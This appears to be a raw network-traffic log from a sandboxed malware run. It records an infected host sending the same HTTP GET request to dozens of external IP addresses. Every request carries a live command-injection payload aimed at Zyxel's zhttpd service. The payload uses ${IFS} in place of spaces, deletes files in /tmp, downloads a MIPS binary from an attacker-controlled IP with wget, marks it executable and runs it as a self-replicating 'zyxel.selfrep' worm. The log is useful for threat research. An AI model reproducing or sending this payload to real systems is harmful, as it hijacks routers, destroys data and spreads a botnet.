                                        Mar 31, 2024 09:20:40.337913036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1705192.168.2.2357804171.178.136.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337949038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1706192.168.2.233633680.196.116.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338002920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1707192.168.2.234408635.213.19.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338035107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1708192.168.2.235801082.203.184.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338088036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1709192.168.2.234871249.51.121.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338123083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1710192.168.2.2345498113.176.58.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338162899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1711192.168.2.234669244.238.193.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338217974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1712192.168.2.234407267.14.66.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338244915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1713192.168.2.2354628105.88.133.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338310003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1714192.168.2.2335122135.234.233.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338334084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1715192.168.2.235974439.247.188.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338371992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1716192.168.2.2339190141.192.156.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338418961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1717192.168.2.2347788104.254.67.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338453054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1718192.168.2.235310437.218.162.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338474989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1719192.168.2.2352780180.29.99.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338505983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1720192.168.2.2347990172.100.22.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338557959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1721192.168.2.2334458161.26.156.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338586092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1722192.168.2.2346944158.204.28.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338622093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1723192.168.2.23390822.202.211.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338679075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1724192.168.2.234853045.116.248.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338716030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1725192.168.2.233922849.134.220.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338757992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1726192.168.2.233388480.114.190.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338805914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1727192.168.2.2347900140.28.111.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338857889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1728192.168.2.2333462218.232.70.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338888884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1729192.168.2.2335552126.169.5.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338928938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1730192.168.2.234045076.222.241.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338972092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1731192.168.2.235036631.186.4.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.338994980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1732192.168.2.2354296148.224.194.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339039087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1733192.168.2.2346998129.127.32.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339086056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1734192.168.2.2351702159.145.139.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339127064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1735192.168.2.2338600120.245.18.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339175940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1736192.168.2.235259666.139.7.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339221001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1737192.168.2.2352196134.105.217.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339241982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1738192.168.2.2341008193.168.31.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339296103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1739192.168.2.2352158204.55.214.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339329004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1740192.168.2.233515842.54.215.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339373112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1741192.168.2.2339618187.64.3.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339418888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1742192.168.2.235896243.224.210.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339461088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1743192.168.2.2356882192.136.215.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339493036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1744192.168.2.2333004101.80.163.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339548111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1745192.168.2.235057051.46.194.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339584112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1746192.168.2.2354222217.45.186.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339641094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1747192.168.2.235155493.45.226.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339678049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1748192.168.2.2333522218.99.95.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339726925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1749192.168.2.2336338207.108.17.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339782953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1750192.168.2.234634627.214.229.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339819908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1751192.168.2.2341610179.107.106.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339852095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1752192.168.2.2337922100.127.156.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339884043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1753192.168.2.234525219.167.218.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339934111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1754192.168.2.2340326110.228.113.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.339965105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1755192.168.2.2334694104.166.42.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340014935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1756192.168.2.2336434205.206.160.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340059042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1757192.168.2.23474541.222.151.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340111971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1758192.168.2.236025618.6.238.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340154886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1759192.168.2.235620049.36.73.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340193987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1760192.168.2.2356222161.100.2.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340238094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1761192.168.2.233539693.155.134.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340291977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1762192.168.2.2345118105.24.61.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340325117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1763192.168.2.2351784200.237.128.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340378046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1764192.168.2.2341350130.248.93.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340413094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1765192.168.2.2334830144.68.118.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340454102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1766192.168.2.235197838.180.224.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340502977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1767192.168.2.234546091.54.221.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340536118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1768192.168.2.235513069.188.135.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340583086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1769192.168.2.2353330218.86.78.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340634108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1770192.168.2.2351182169.175.32.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340653896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1771192.168.2.2346504190.155.4.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340714931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1772192.168.2.2336806222.229.69.216443
                                        TimestampBytes transferredDirectionData
